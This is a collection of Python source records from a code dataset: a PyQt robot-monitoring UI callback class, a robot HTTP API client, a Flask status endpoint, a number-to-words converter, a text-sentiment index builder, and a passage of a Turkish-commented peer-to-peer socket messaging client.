fontproperties=fp)\nplt.show()\n\n","sub_path":"30_39/ans37k.py","file_name":"ans37k.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"11851426","text":"from PyQt5.QtGui import QPixmap, QImage\nimport json\nimport cv2\nimport numpy\nimport os\nimport subprocess\nimport signal\nimport robot_api\nimport requests\n\nfrom thread_class import message_display_Thread\nclass Callback(object):\n#返回调用函数\n#{ 响应的统一格式,successed表示请求接口是否成功,失败msg会有错误信息,如果有返回数据,统一在data里获取\n# \"data\":\"\",\n# \"errorCode\":\"\",\n# \"msg\":\"successed\",\n# \"successed\":\"true\"\n# }\n def callback(self,response):\n try:\n if response.content != b\"\":\n response_message = json.loads(response.content) #从json里恢复字典\n if response_message[\"successed\"] != True:\n self.error_view_thread = message_display_Thread(\"error\",response_message[\"msg\"]) # 实例化自己建立的任务线程类\n self.error_view_thread.start()\n else:\n if response_message[\"data\"] != \"\":\n print(response_message[\"data\"])\n except Exception as e:\n print(e)\n\n \n def map_png_callback(self,response):\n image_num = numpy.fromstring(response.content, numpy.uint8) #将字符串转为numpy矩阵\n #opencv可以直接解码png二进制流\n decimg = cv2.imdecode(image_num, cv2.IMREAD_COLOR) #将矩阵解码成图像\n \n shrink = cv2.cvtColor(decimg, cv2.COLOR_BGR2RGB) #将bgr(opencv)转为rgb(pyqt5)\n QtImg = QImage(shrink.data,\n shrink.shape[1],\n shrink.shape[0],\n shrink.shape[1] * 3,\n QImage.Format_RGB888)\n \n self.map_label.setPixmap(QPixmap.fromImage(QtImg))\n self.map_label.setScaledContents(True) # 图片自适应LABEL大小\n self.map_label.show()\n\n def map_png_callback_location(self):\n try:\n decimg = cv2.imread('/home/huziwei/CruiseRobot/ui_background/factoryall.png',cv2.IMREAD_COLOR)\n \n shrink = cv2.cvtColor(decimg, cv2.COLOR_BGR2RGB) #将bgr(opencv)转为rgb(pyqt5)\n QtImg = QImage(shrink.data,\n shrink.shape[1],\n shrink.shape[0],\n shrink.shape[1] * 3,\n QImage.Format_RGB888)\n #生成小车在地图上的位置\n self.map_label.setPixmap(QPixmap.fromImage(QtImg))\n self.map_label.setScaledContents(True) # 图片自适应LABEL大小\n self.map_label.show()\n except Exception as e:\n print(e)\n return\n\n def video_receive_callback(self, data):\n try:\n image_num = numpy.fromstring(data, numpy.uint8) #将字符串转为numpy矩阵\n decimg = cv2.imdecode(image_num, cv2.IMREAD_COLOR) #将矩阵解码成图像\n shrink = cv2.cvtColor(decimg, cv2.COLOR_BGR2RGB) #将bgr(opencv)转为rgb(pyqt5)\n QtImg = QImage(shrink.data,\n shrink.shape[1],\n shrink.shape[0],\n shrink.shape[1] * 3,\n QImage.Format_RGB888)\n\n self.video_label.setPixmap(QPixmap.fromImage(QtImg))\n self.video_label.setScaledContents(True) # 图片自适应LABEL大小\n self.video_label.show()\n except Exception:\n return\n\n def red_video_receive_callback(self, data):\n try:\n image_num = numpy.fromstring(data, numpy.uint8) #将字符串转为numpy矩阵\n decimg = cv2.imdecode(image_num, cv2.IMREAD_COLOR) #将矩阵解码成图像\n shrink = cv2.cvtColor(decimg, cv2.COLOR_BGR2RGB) #将bgr(opencv)转为rgb(pyqt5)\n QtImg = QImage(shrink.data,\n shrink.shape[1],\n shrink.shape[0],\n shrink.shape[1] * 3,\n QImage.Format_RGB888)\n\n self.red_video_label.setPixmap(QPixmap.fromImage(QtImg))\n self.red_video_label.setScaledContents(True) # 图片��适应LABEL大小\n self.red_video_label.show()\n except Exception:\n return\n\n def voice_receive_callback(self, data):\n try:\n self.voice_stream.write(data)\n except Exception:\n return\n\n def robot_data_receive_thread_callback(self, respond):\n try:\n data = json.loads(respond.content)\n if data['successed'] != True:\n if data['errorCode'] != 'link_error':\n self.link_status_text_label.setText(\"未初始化\")\n else:\n self.link_status_text_label.setText(\"服务器断开\")\n return\n self.battery_text_label.setText(\"null\")\n self.robot_speed_text_label.setText(\"null\")\n self.charger_status_text_label.setText(\"null\")\n self.charger_status_text_label.setText(\"null\")\n self.navigate_speed_text_label.setText(\"null\")\n else:\n self.link_status_text_label.setText(\"正在运行\")\n self.battery_text_label.setText(f\"{data['data']['battery']}\")\n self.robot_speed_text_label.setText(f\"{data['data']['speed']}\")\n self.navigate_speed_text_label.setText(f\"{data['data']['navigationSpeedLevel']}\")\n self.charger_status_text_label.setText(f\"{data['data']['noticeType']}\")\n\n self.robot_map_datas[\"robot_position\"][\"x\"] = data['data'][\"robot_position\"][\"x\"]\n self.robot_map_datas[\"robot_position\"][\"y\"] = data['data'][\"robot_position\"][\"y\"]\n self.robot_map_datas[\"robot_position\"][\"angle\"] = data['data'][\"robot_position\"][\"angle\"]\n self.robot_map_datas[\"map_width\"] = data['data'][\"map_width\"]\n self.robot_map_datas[\"map_height\"] = data['data'][\"map_height\"]\n x = data['data'][\"robot_position\"][\"x\"]*self.map_widget.width()//self.robot_map_datas[\"map_width\"]\n y = self.map_widget.height() - data['data'][\"robot_position\"][\"y\"]*self.map_widget.height()//self.robot_map_datas[\"map_height\"]\n self.map_label.receive_param(x,y)\n\n self.gas_one_text_label.setText(f\"{data['data']['sensor1']}%\")\n self.gas_two_text_label.setText(f\"{data['data']['sensor2']}%\")\n if data['data']['sensor1'] >50 or data['data']['sensor2'] >50:\n self.security_status_text_label.setText(\"高度风险\")\n self.security_status_text_label.setStyleSheet(\"background-color:red;\")\n elif data['data']['sensor1'] >25 or data['data']['sensor2'] >25:\n self.security_status_text_label.setText(\"中度风险\")\n self.security_status_text_label.setStyleSheet(\"background-color:yellow;\")\n if not self.light_is_open:\n respond = requests.get(f\"http://{robot_api.robot_ip}:{robot_api.robot_port}{robot_api.API['open_light']}\", timeout=3)\n self.light_is_open = True\n else:\n self.security_status_text_label.setText(\"安全\")\n self.security_status_text_label.setStyleSheet(\"background-color:rgb(78, 154, 6);\")\n if self.light_is_open:\n respond = requests.get(f\"http://{robot_api.robot_ip}:{robot_api.robot_port}{robot_api.API['close_light']}\", timeout=3)\n self.light_is_open = False\n except Exception as e:\n print(e)\n return\n\n def robot_position_callback(self,data): #实时显示机器人位置\n try:\n self.robot_map_datas[\"robot_position\"][\"x\"] = data[\"gridPosition\"][\"x\"]\n self.robot_map_datas[\"robot_position\"][\"y\"] = data[\"gridPosition\"][\"y\"]\n self.robot_map_datas[\"robot_position\"][\"angle\"] = data[\"angle\"]\n self.robot_map_datas[\"map_width\"] = data[\"mapInfo\"][\"gridWidth\"]\n self.robot_map_datas[\"map_height\"] = data[\"mapInfo\"][\"gridHeight\"]\n x = data[\"gridPosition\"][\"x\"]*self.map_widget.width()//self.robot_map_datas[\"map_width\"]\n y = self.map_widget.height() - data[\"gridPosition\"][\"y\"]*self.map_widget.height()//self.robot_map_datas[\"map_height\"]\n self.map_label.receive_param(x,y)\n except Exception:\n return\n\n def video_open_callback(self,data = ''): #启动视频解码\n try:\n if self.video_process == None:\n self.video_process = subprocess.Popen(\"./src/video_decode\")#启动解码程序\n except Exception as e:\n print(e)\n \n def video_close_callback(self,data = ''): #关闭视频解码\n try:\n if self.video_process != None:\n self.video_process.send_signal(signal.SIGINT)\n except Exception as e:\n print(e)\n self.video_process = None #解码进程关闭\n self.video_red_process = None #解码进程关闭","sub_path":"ui_background/src/callback.py","file_name":"callback.py","file_ext":"py","file_size_in_byte":9166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"329515956","text":"# -*- coding: utf-8 -*-\nimport requests\nimport logging\n\nclass APICaller():\n url = 'http://10.10.4.66:5000'\n timeout = 120\n \n def __init__(self):\n self.logger = logging.getLogger('APICaller')\n \n def turn_left(self, angle):\n \"\"\"\n Calls robot´s API to turn him left\n param:\n angle: number of degrees whitch robot will be turned to left\n \n returns:\n True after robot ends the operation or False if somethink failed\n raise:\n ValueError if angle is negative\n \"\"\"\n if angle > 0:\n logging.critical('Angle is negative ' + str(angle))\n \n return self.__send_turn_request(angle=angle * (-1))\n \n def turn_right(self, angle):\n logging.debug('Turning right')\n return self.__send_turn_request(angle=angle)\n \n def move_forward(self, cm):\n \n params = {'cm': cm} \n \n try:\n self.logger.debug('Sending move_forward request ({0} cm)'.format(cm))\n requests.get(self.url + '/move/forward', params=params, timeout=self.timeout)\n except requests.exceptions.Timeout:\n self.logger.warn('move_forward timeout exception')\n \n return True\n \n def is_in_range(self):\n \"\"\"\n return: True of False\n raise: TimeoutException\n \"\"\"\n self.logger.debug('Sending is_in_range request')\n response = requests.get(self.url + '/trash/isinrange', timeout=self.timeout)\n self.logger.debug('Response: ' + str(response.json()))\n \n return response.json()\n \n def pick_up(self):\n \"\"\"\n return: True if is everithing OK\n raise: TimeoutException\n \"\"\"\n self.logger.debug('Sending pick_up request')\n response = requests.get(self.url + '/trash/pickup', timeout=self.timeout)\n if not response.ok:\n self.logger.error('Response is not OK')\n return False\n \n self.logger.debug('Response: ' + str(response.json()))\n return response.json()\n \n \n def __send_turn_request(self, angle):\n\n params = {'angle': angle}\n try:\n self.logger.debug('Sending turn request ({0} angle)'.format(angle))\n response = requests.get(self.url + '/move/turn', params=params, timeout=self.timeout)\n except requests.exceptions.Timeout:\n self.logger.warn('turn request timeout exception')\n return False\n \n if not response.ok:\n self.logger.error('Response is not OK')\n return False\n \n self.logger.debug('Response: ' + str(response.json()))\n return response.json()\n \n \n \n \n \n \n \n \n ","sub_path":"AI/api_caller.py","file_name":"api_caller.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"99842177","text":"from flask_restplus import Namespace, Resource\nimport threading\n\napi = Namespace(\"status\", description=\"Status of the management server\")\n\n\n@api.route(\"/\", strict_slashes=False)\nclass Code(Resource):\n def get(self):\n \"\"\" Get management server status information \"\"\"\n return {\n \"status\": \"happy\",\n \"num_active_threads\": threading.active_count(),\n \"active_threads\": [f\"{t.name} ({t.ident})\" for t in threading.enumerate()],\n }\n","sub_path":"src/datalaunch_server/api/v0/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"364679344","text":"\n\nm1 = {\n '0': '',\n '1': 'one',\n '2': 'two',\n '3': 'three',\n '4': 'four',\n '5': 'five',\n '6': 'six',\n '7': 'seven',\n '8': 'eight',\n '9': 'nine',\n}\n\nm2 = {\n '0': '',\n '2': 'twenty',\n '3': 'thirty',\n '4': 'fourty',\n '5': 'fifty',\n '6': 'sixty',\n '7': 'seventy',\n '8': 'eighty',\n '9': 'ninety',\n}\n\nm3 = {\n '10': 'ten',\n '11': 'eleven',\n '12': 'twelve',\n '13': 'thirteen',\n '14': 'fourteen',\n '15': 'fifteen',\n '16': 'sixteen',\n '17': 'seventeen',\n '18': 'eightteen',\n '19': 'nineteen',\n}\n\n\ndef translate(num):\n chunks = convert_to_chunks(num)\n\n output = []\n output.append(translate_chunk(chunks[0], 'billion'))\n output.append(translate_chunk(chunks[1], 'million'))\n output.append(translate_chunk(chunks[2], 'thousand'))\n output.append(translate_chunk(chunks[3], ''))\n\n return ' '.join(output)\n\n\ndef convert_to_chunks(num):\n billion = str(num // 1000000000).zfill(3)\n million = str((num % 1000000000) // 1000000).zfill(3)\n thousand = str((num % 1000000) // 1000).zfill(3)\n remaining = str(num % 1000).zfill(3)\n\n return [billion, million, thousand, remaining]\n\n\ndef translate_chunk(chunk, ending):\n if chunk == '000':\n return ''\n\n output = []\n\n if chunk[0] != '0':\n output.append(m1.get(chunk[0]) + ' hundred')\n\n if chunk[1] == '1':\n output.append(m3.get(chunk[1:]))\n else:\n output.append(m2.get(chunk[1]))\n output.append(m1.get(chunk[2]))\n\n output.append(ending)\n return ' '.join(output)\n\n\nprint(translate(1250312000))\n","sub_path":"num_to_english.py","file_name":"num_to_english.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"405694972","text":"\r\nfrom word_analysis import *\r\nfrom dictionary import *\r\n\r\n\r\ndef load_nagation(negation_file):\r\n negationwords_df = pd.read_csv(negation_file, header=None)\r\n negationwords_df.columns = ['negation']\r\n negation = negationwords_df['negation'].values.tolist()\r\n return negation\r\n\r\ndef create_sentiment_dictionaries(senti_file, negation_file, use_stem=False, use_lemma=True):\r\n\r\n sentiwords_df = pd.read_csv(senti_file)\r\n\r\n sentiwords_df.columns = ['dovish', 'dovish_count', 'dovish_score',\r\n 'blank', 'hawkish', 'hawkish_count', 'hawkish_score']\r\n\r\n hawkish_df = sentiwords_df[['hawkish', 'hawkish_count']]\r\n hawkish_df = hawkish_df.dropna()\r\n\r\n dovish_df = sentiwords_df[['dovish', 'dovish_count']]\r\n dovish_df = dovish_df.dropna()\r\n\r\n hawkish = hawkish_df['hawkish'].values.tolist()\r\n dovish = dovish_df['dovish'].values.tolist()\r\n\r\n negation = load_nagation(negation_file)\r\n\r\n\r\n sentiment_dictionary = {}\r\n\r\n sentiment_dictionary['positive'] = {}\r\n sentiment_dictionary['negative'] = {}\r\n sentiment_dictionary['negation'] = {}\r\n\r\n for word in hawkish:\r\n\r\n if use_lemma:\r\n word = lemmatizer.lemmatize(word)\r\n if use_stem:\r\n word = snow_stemmer.stem(word)\r\n\r\n sentiment_dictionary['positive'][word] = 0\r\n\r\n\r\n for word in dovish:\r\n\r\n if use_lemma:\r\n word = lemmatizer.lemmatize(word)\r\n if use_stem:\r\n word = snow_stemmer.stem(word)\r\n\r\n sentiment_dictionary['negative'][word] = 0\r\n\r\n for word in negation:\r\n\r\n if use_lemma:\r\n word = lemmatizer.lemmatize(word)\r\n if use_stem:\r\n word = snow_stemmer.stem(word)\r\n\r\n sentiment_dictionary['negation'][word] = 0\r\n\r\n\r\n return sentiment_dictionary\r\n\r\n\r\n\r\n\r\nclass ForwardGuidanceIndicatorMins(object):\r\n sentence_df = []\r\n all_senti_score_df = []\r\n\r\n fgi_index_df = []\r\n # fgi_index_colnames = []\r\n isallsentiscore = False\r\n\r\n def __init__(self, text_data, sentiment_dictionary):\r\n\r\n self.sentence_df = text_data.get_sentence_data()\r\n self.sentiment_dictionary = sentiment_dictionary\r\n\r\n @staticmethod\r\n def get_nan_senti_score_df():\r\n return pd.DataFrame([{'senti_words': [], 'senti_sore': np.nan,\r\n 'negation_score': np.nan}])\r\n @staticmethod\r\n def get_senti_score_df(senti_sents, sentiment_dictionary, use_stem=False):\r\n if len(senti_sents) > 0:\r\n hawkish_list = sentiment_dictionary['positive'].keys()\r\n\r\n dovish_list = sentiment_dictionary['negative'].keys()\r\n\r\n negation_list = sentiment_dictionary['negation'].keys()\r\n\r\n senti_score_df = pd.DataFrame()\r\n\r\n\r\n for sent in senti_sents:\r\n senti_tokens = TextData.custom_tokenizer(sent, use_stem=False, use_lemma=True)\r\n for i in range(0, len(senti_tokens)):\r\n word = senti_tokens[i]\r\n if use_stem:\r\n word = snow_stemmer.stem(word)\r\n\r\n if word in hawkish_list:\r\n\r\n negation_score = 1\r\n if i > 0 and senti_tokens[i - 1] in negation_list:\r\n negation_score = -1\r\n\r\n data = [\r\n {'senti_words': word, 'senti_sore': 1,\r\n 'negation_score': negation_score}]\r\n\r\n senti_score_df = senti_score_df.append(pd.DataFrame(data), ignore_index=True)\r\n\r\n if word in dovish_list:\r\n\r\n negation_score = 1\r\n if i > 0 and senti_tokens[i - 1] in negation_list:\r\n negation_score = -1\r\n\r\n data = [\r\n {'senti_words': word, 'senti_sore': -1,\r\n 'negation_score': negation_score}]\r\n senti_score_df = senti_score_df.append(pd.DataFrame(data), ignore_index=True)\r\n\r\n if senti_score_df.shape[0] == 0:\r\n senti_score_df = ForwardGuidanceIndicatorMins.get_nan_senti_score_df()\r\n\r\n else:\r\n senti_score_df = ForwardGuidanceIndicatorMins.get_nan_senti_score_df()\r\n return senti_score_df\r\n @staticmethod\r\n def get_score(senti_score_df):\r\n if senti_score_df.shape[0] > 0:\r\n hawkish_score_df = senti_score_df[senti_score_df['senti_sore'] > 0]\r\n dovish_score_df = senti_score_df[senti_score_df['senti_sore'] < 0]\r\n\r\n h_score = 0\r\n d_score = 0\r\n\r\n if hawkish_score_df.shape[0] > 0:\r\n h_score = sum(hawkish_score_df['senti_sore'].values * hawkish_score_df['negation_score'].values )\r\n\r\n if dovish_score_df.shape[0] > 0:\r\n\r\n d_score = sum(dovish_score_df['senti_sore'].values * dovish_score_df['negation_score'].values)\r\n\r\n sum_score = abs(h_score) + abs(d_score)\r\n if sum_score == 0:\r\n fgi = np.nan\r\n else:\r\n fgi = 2 * (h_score + d_score) / sum_score\r\n else:\r\n fgi = np.nan\r\n\r\n return fgi\r\n\r\n def reindex(self, start_date = None, end_date = None, freq='MS', method='pad'):\r\n if start_date is None:\r\n start_date = self.sentence_df.index[0]\r\n if end_date is None:\r\n end_date = self.sentence_df.index[-1]\r\n\r\n new_dates = pd.date_range(start=start_date, end=end_date, freq=freq)\r\n\r\n self.sentence_df = self.sentence_df.reindex(new_dates, method=method)\r\n\r\n def build_fgi_index(self, start_date='1976-01-01', end_date='2018-01-01', freq='MS', method='pad'):\r\n self.reindex(start_date=start_date, end_date=end_date, freq=freq, method=method)\r\n fgi_index = pd.DataFrame(columns=['fgi'], index=range(0, self.sentence_df.shape[0]))\r\n\r\n for i in range(0, self.sentence_df.shape[0]):\r\n print(i)\r\n sent_score_df = ForwardGuidanceIndicatorMins.get_senti_score_df(self.sentence_df[i], self.sentiment_dictionary)\r\n fgi_index['fgi'].loc[i] = ForwardGuidanceIndicatorMins.get_score(sent_score_df)\r\n\r\n fgi_index['date'] = self.sentence_df.index\r\n fgi_index = fgi_index.set_index(['date'])\r\n self.fgi_index_df = fgi_index.fillna(method='ffill')\r\n\r\n","sub_path":"fgindicatormins.py","file_name":"fgindicatormins.py","file_ext":"py","file_size_in_byte":6389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"582716093","text":"#!/usr/bin/env python\r\n# ! -*- coding: utf-8 -*-\r\n\r\nimport threading\r\nimport socket\r\nimport queue\r\n\r\nimport sys\r\nimport socket\r\nimport threading\r\nfrom PyQt5.QtCore import *\r\nimport rsa\r\nfrom PyQt5.QtWidgets import *\r\nfrom PyQt5.uic import loadUi\r\nimport queue\r\nimport time\r\nimport functools\r\n\r\nfrom datetime import datetime\r\n\r\n\r\n# projedeki sunucu için basit bir başlangıç dosyasıdır.\r\n\r\n# sunucunun kod ikeleti bu. unutulmaması gereken nokta şu ki bütün istekler sunuculara gidiyor. sunucu da cevap veiyor.\r\n# sunucu request atmıyor. sadece dış istemciden gelen isteğe cevap verecek ve kendi istemcilerine bi şeyler söyleyecek şekilde tasarlanmalı.\r\n# peer sistemi olacak. merkezi olmasa da bu yine de çoklu bağlantı demek olacak. sunucu sürekli bağlantı bekler halde olmalı yani.\r\n# her sunucunun 1 write, 1 read threadi olmalı. çünkü gelen istekleri alması ve\r\n\r\n\r\nIstemcilerFihristi = {}\r\n\r\n\r\n\r\nclass LogThread(threading.Thread):\r\n def __init__(self, logQueue, Filename):\r\n threading.Thread.__init__(self)\r\n self.lqueue = logQueue\r\n self.fname = Filename\r\n\r\n def run(self):\r\n with open(self.fname, 'w+') as f:\r\n while True:\r\n data = self.lqueue.get()\r\n\r\n f.write(\"%s %s \\r \" % (time.strftime(\"%a, %d %b %Y %H:%M:%S \", time.gmtime()), data))\r\n f.flush()\r\n pass\r\n\r\n\r\n\r\nclass ReadThreadIstemci(threading.Thread):\r\n def __init__(self, csoc, writeQueue, screenQueue, uuid, ip, port, selfIP, selfPORT, sistemTipi, geoloc, nickname,\r\n my_public_key, my_private_key, arzFihristi, talepFihristi, komsuFihristi,abonelikFihristi,komsuArzFihristi, komsuTalepFihristi,lQueue):\r\n threading.Thread.__init__(self)\r\n self.csoc = csoc\r\n self.nickname = nickname\r\n self.ip = ip\r\n self.port = port\r\n self.selfIP = selfIP\r\n self.selfPORT = selfPORT\r\n self.uuid = uuid\r\n self.arzFihristi = arzFihristi\r\n self.talepFihristi = talepFihristi\r\n self.sistemTipi = sistemTipi\r\n self.geoloc = geoloc\r\n self.my_public_key = my_public_key\r\n self.my_private_key = my_private_key\r\n self.writeQueue = writeQueue\r\n self.screenQueue = screenQueue\r\n self.serverID = \"\" #bağlandığımız kişinin uuidsi\r\n self.komsuFihristi=komsuFihristi\r\n self.abonelikFihristi=abonelikFihristi\r\n self.komsuArzFihristi=komsuArzFihristi\r\n self.komsuTalepFihristi = komsuTalepFihristi\r\n self.serverIP=\"\" #bağlandığımız kişinin ip'si\r\n self.serverPORT=\"\" #bağlandığımız kişinin portu\r\n self.lQueue=lQueue\r\n\r\n\r\n def incoming_parser(self, dataInByte):\r\n\r\n \"\"\"data = dataInByte.decode()\r\n\r\n parsedData = dataInByte.decode().split(\":\")\r\n \"\"\"\r\n anlamli_data = \"\"\r\n if len(dataInByte) == 0:\r\n return\r\n\r\n if dataInByte[0:2] == \"OG\".encode():\r\n data = dataInByte.decode()\r\n uuid=data.split(\":\")[1]\r\n anlamli_data = str(uuid) + \" kullanicisiyla olan tanisma onaylandi.\"\r\n self.lQueue.put(\"OG islemi basarili\")\r\n self.writeQueue.put(\"PK:\" + str(self.my_public_key.n) + \":\" + str(self.my_public_key.e))\r\n\r\n elif dataInByte[0:2] == \"ON\".encode():\r\n anlamli_data = \"UUID testi basarisiz.\"\r\n #self.csoc.close()\r\n\r\n\r\n # test_uuid = data.split(\":\")[1]\r\n # print(test_uuid)\r\n # print(self.responseuuid)\r\n # if test_uuid == self.responseuuid:\r\n # anlamli_data = str(self.responseuuid) + \" kullanisina olan baglanti basarili. Tanisma islemi basliyor\"\r\n\r\n # tanisma_komutu = \"RG\" + \":\" + str(self.uuid) + \":\" + str(self.ip) + \":\" + str(\r\n # self.port) + \":\" + self.geoloc + \":\" + self.sistemTipi + \":\" + self.nickname\r\n # self.writeQueue.put(tanisma_komutu)\r\n\r\n # else:\r\n # anlamli_data = \"UUID testi basarisiz tekrar baglanti kurmayi deneyin.\"\r\n # self.csoc.close()\r\n\r\n elif dataInByte[0:2] == \"BY\".encode():\r\n anlamli_data = \"Baglanti sonlandirildi\"\r\n\r\n\r\n elif dataInByte[0:2] == \"HE\".encode():\r\n data = dataInByte.decode()\r\n self.serverID = data.split(\":\")[1]\r\n anlamli_data = str(self.serverID) + \" kullanicisi size merhaba diyor.\"\r\n self.lQueue.put(\"HE islemi basarili\"+str(self.serverID)+\" karsidan gelen \")\r\n print(\"HE lqueue olmasi lazim normalde\")\r\n t = time.localtime()\r\n\r\n pt = \"%02d/%02d/%02d\" % (t.tm_hour, t.tm_min, t.tm_sec)\r\n\r\n pt = \"%02d.%02d.%02d\" % (t.tm_hour, t.tm_min, t.tm_sec)\r\n\r\n self.writeQueue.put(\"RG\" + \":\" + str(self.uuid) + \":\" + str(self.selfIP) + \":\" + str(self.selfPORT) + \":\" + pt + \":\"\r\n + str(self.my_public_key.e)+ \":\" + str(self.my_public_key.n) + \":\" + \"kordinat\" + \":\" + self.nickname\r\n + \":\" + self.sistemTipi)\r\n print(\"RG\" + \":\" + str(self.uuid) + \":\" + str(self.selfIP) + \":\" + str(self.selfPORT) + \":\" + pt + \":\"\r\n + str(self.my_public_key.e)+ \":\" + str(self.my_public_key.n) + \":\" + \"kordinat\" + \":\" + self.nickname\r\n + \":\" + self.sistemTipi)\r\n elif dataInByte[0:2] == \"RO\".encode():\r\n anlamli_data = \"Tanisma onaylandi.\"\r\n\r\n elif dataInByte[0:2] == \"TN\".encode():\r\n anlamli_data = \"Alisveris basarili degil!\"\r\n elif dataInByte[0:2] == \"RN\".encode():\r\n data = dataInByte.decode()\r\n if data[0:3] == \"RNN\":\r\n anlamli_data = \"ID kontrolleri yapiliyor.\"\r\n self.lQueue.put(\"ID esleme basarili\"+str(self.uuid)+\"ve\" +str(self.serverID)+\" arasi\")\r\n self.writeQueue.put(data.replace(\"RNN\", \"IG\"))\r\n elif data[0:4] == \"RNBT\":\r\n anlamli_data = \"Bu kullanıcı engellenmişti.\"\r\n elif data[0:4] == \"RNBF\":\r\n anlamli_data = \"Bu kullanıcının engeli kaldırılmıştı.\"\r\n elif data[0:4] == \"RNBB\":\r\n anlamli_data = \"Engellenmeden engel kaldırılamaz.\"\r\n elif data[0:4] == \"RNUT\":\r\n anlamli_data = \"Üye olunmuştu.\"\r\n elif data[0:4] == \"RNUF\":\r\n anlamli_data = \"Üyelikten çıkılmıştı.\"\r\n elif data[0:4] == \"RNUO\":\r\n anlamli_data = \"Üye olmadan üyelikten çıkılmaz.\"\r\n elif(self.abonelikFihristi[int(self.serverID)][3]==True):\r\n anlamli_data = \"Karşı sistemde engellisiniz.\"\r\n else:\r\n anlamli_data = \"Bu kişi sende engelli.\"\r\n\r\n\r\n elif dataInByte[0:5] == \"BEGIN\".encode():\r\n\r\n anlamli_data = \"CO:BEGIN\"\r\n\r\n data = str(dataInByte.decode())\r\n\r\n #print(data[0:5])\r\n\r\n data = data.replace(\"BEGIN\", \"CS\")\r\n\r\n #print(data)\r\n\r\n # self.writeQueue.put(str(dataInByte.decode()).replace(\"CO:BEGIN\", \"CS\"))\r\n\r\n self.writeQueue.put(data)\r\n\r\n\r\n elif dataInByte[0:6] != \"CO:END\".encode() and dataInByte[0:8] != \"CO:BEGIN\".encode() and dataInByte[\r\n\r\n 0:2] == \"CO\".encode():\r\n #print(\"1\")\r\n # print(dataInByte)\r\n # print(type(dataInByte.decode()))\r\n #print(list(dataInByte))\r\n\r\n if (\",\" in str(dataInByte)):\r\n\r\n\r\n anlamli_data = dataInByte.decode().split(\",\")[0]\r\n if (int(str(dataInByte.decode()).split(\":\")[1]) != int(self.uuid)):\r\n self.komsuFihristi[int(str(dataInByte.decode()).split(\":\")[1])] = [\r\n str(dataInByte.decode()).split(\":\")[2],\r\n int(str(dataInByte.decode()).split(\":\")[3]),\r\n str(dataInByte.decode()).split(\":\")[4],\r\n int(str(dataInByte.decode()).split(\":\")[5]),\r\n int(str(dataInByte.decode()).split(\":\")[6]),\r\n str(dataInByte.decode()).split(\":\")[7],\r\n str(dataInByte.decode()).split(\":\")[8],\r\n str(dataInByte.decode()).split(\":\")[9]]\r\n\r\n\r\n data = dataInByte.decode().replace(dataInByte.decode().split(\",\")[0] + \",\", \"\")\r\n\r\n self.writeQueue.put(\"AV;\" + str(data))\r\n\r\n # print(data)\r\n\r\n else:\r\n if (int(str(dataInByte.decode()).split(\":\")[1]) != int(self.uuid)):\r\n self.komsuFihristi[int(str(dataInByte.decode()).split(\":\")[1])] = [\r\n str(dataInByte.decode()).split(\":\")[2],\r\n int(str(dataInByte.decode()).split(\":\")[3]),\r\n str(dataInByte.decode()).split(\":\")[4],\r\n int(str(dataInByte.decode()).split(\":\")[5]),\r\n int(str(dataInByte.decode()).split(\":\")[6]),\r\n str(dataInByte.decode()).split(\":\")[7],\r\n str(dataInByte.decode()).split(\":\")[8],\r\n str(dataInByte.decode()).split(\":\")[9]]\r\n self.writeQueue.put(\"END\")\r\n\r\n anlamli_data = str(dataInByte.decode())\r\n print(\"anlamli data CO2:\")\r\n print(anlamli_data)\r\n\r\n\r\n\r\n elif dataInByte[0:2] == \"AV\".encode():\r\n\r\n if (\",\" in str(dataInByte)):\r\n\r\n if (int(str(dataInByte.decode()).split(\":\")[1]) != int(self.uuid)):\r\n self.komsuFihristi[int(str(dataInByte.decode()).split(\":\")[1])] = [\r\n str(dataInByte.decode()).split(\":\")[2],\r\n int(str(dataInByte.decode()).split(\":\")[3]),\r\n str(dataInByte.decode()).split(\":\")[4],\r\n int(str(dataInByte.decode()).split(\":\")[5]),\r\n int(str(dataInByte.decode()).split(\":\")[6]),\r\n str(dataInByte.decode()).split(\":\")[7],\r\n str(dataInByte.decode()).split(\":\")[8],\r\n str(dataInByte.decode()).split(\":\")[9]]\r\n\r\n anlamli_data = dataInByte.decode().split(\",\")[0].replace(\"AV;\", \"\")\r\n print(\"anlamli data CO3:\")\r\n print(anlamli_data)\r\n\r\n data = dataInByte.decode().replace(dataInByte.decode().split(\",\")[0] + \",\", \"\")\r\n\r\n self.writeQueue.put(\"AV;\" + str(data))\r\n\r\n #print(data)\r\n\r\n else:\r\n if(int(str(dataInByte.decode()).split(\":\")[1]) != int(self.uuid)):\r\n self.komsuFihristi[int(str(dataInByte.decode()).split(\":\")[1])] = [\r\n str(dataInByte.decode()).split(\":\")[2],\r\n int(str(dataInByte.decode()).split(\":\")[3]),\r\n str(dataInByte.decode()).split(\":\")[4],\r\n int(str(dataInByte.decode()).split(\":\")[5]),\r\n int(str(dataInByte.decode()).split(\":\")[6]),\r\n str(dataInByte.decode()).split(\":\")[7],\r\n str(dataInByte.decode()).split(\":\")[8],\r\n str(dataInByte.decode()).split(\":\")[9]]\r\n\r\n data = str(dataInByte.decode()).split(\";\")[1].replace(\"AV;\", \"\")\r\n\r\n\r\n\r\n\r\n anlamli_data = data\r\n if (int(str(dataInByte.decode()).split(\":\")[1]) != int(self.uuid)):\r\n self.komsuFihristi[int(str(dataInByte.decode()).split(\":\")[1])] = [\r\n str(dataInByte.decode()).split(\":\")[2],\r\n int(str(dataInByte.decode()).split(\":\")[3]),\r\n str(dataInByte.decode()).split(\":\")[4],\r\n int(str(dataInByte.decode()).split(\":\")[5]),\r\n int(str(dataInByte.decode()).split(\":\")[6]),\r\n str(dataInByte.decode()).split(\":\")[7],\r\n str(dataInByte.decode()).split(\":\")[8],\r\n str(dataInByte.decode()).split(\":\")[9]]\r\n\r\n self.writeQueue.put(\"END\")\r\n\r\n\r\n elif dataInByte[0:3] == 